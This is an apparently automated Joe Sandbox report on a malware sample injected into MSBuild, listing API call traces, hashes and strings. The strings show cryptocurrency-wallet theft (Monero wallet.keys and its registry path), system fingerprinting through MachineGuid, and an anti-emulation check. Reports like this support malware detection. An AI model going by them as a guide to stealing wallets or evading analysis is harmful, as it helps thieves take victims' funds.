                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                                      • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                                      • API String ID: 615783205-3586502688
                                                                                                                                                                                                                      • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                                                                                                                      • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: DeleteFileA.KERNEL32(?), ref: 00415CA9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                      • String ID: LzA
                                                                                                                                                                                                                      • API String ID: 1546541418-1388989900
                                                                                                                                                                                                                      • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                                                                                                                      • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040FBC1
                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                                                                                                                                        • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: OpenProcess_memmove_memset
                                                                                                                                                                                                                      • String ID: N0ZWFt
                                                                                                                                                                                                                      • API String ID: 2647191932-431618156
                                                                                                                                                                                                                      • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                                                                                                                      • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                      • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                      • String ID: V@
                                                                                                                                                                                                                      • API String ID: 2311089104-383300688
                                                                                                                                                                                                                      • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                                                                                                                      • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00411607
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                                                                                                                      • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                      • API String ID: 2235053359-1211650757
                                                                                                                                                                                                                      • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                                                                                                                      • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                                                                                                                      • wallet_path, xrefs: 00401A9C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                      • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                                                      • API String ID: 3466090806-4244082812
                                                                                                                                                                                                                      • Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                                                                                                                      • Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,754074F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,754074F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO9ADTntR27UucmkNAwBpKXHPNGKBif54pKXH/6qO1ACUlKeOtFAxPajPBo7UUAJ15oIpcD3o6etACH86OKD1o/KgYlJml7Uf54oGHpSY9qX6UZoAbmjFL2pKADv6UgFKPrRig, xrefs: 0041BD36
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CreatePointer
                                                                                                                                                                                                                      • API String ID: 2024441833-698823426
                                                                                                                                                                                                                      • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                                                                                      • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B9E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                      • String ID: Windows 11
                                                                                                                                                                                                                      • API String ID: 3466090806-2517555085
                                                                                                                                                                                                                      • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                                                                                      • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410C06
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                      • String ID: CurrentBuildNumber
                                                                                                                                                                                                                      • API String ID: 3466090806-1022791448
                                                                                                                                                                                                                      • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                                                                                      • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004156A4
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004156F6
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3891774339-0
                                                                                                                                                                                                                      • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                                                                                      • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                                                                                      • _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 181426013-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004010D0
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                                                                                                                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1859398019-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
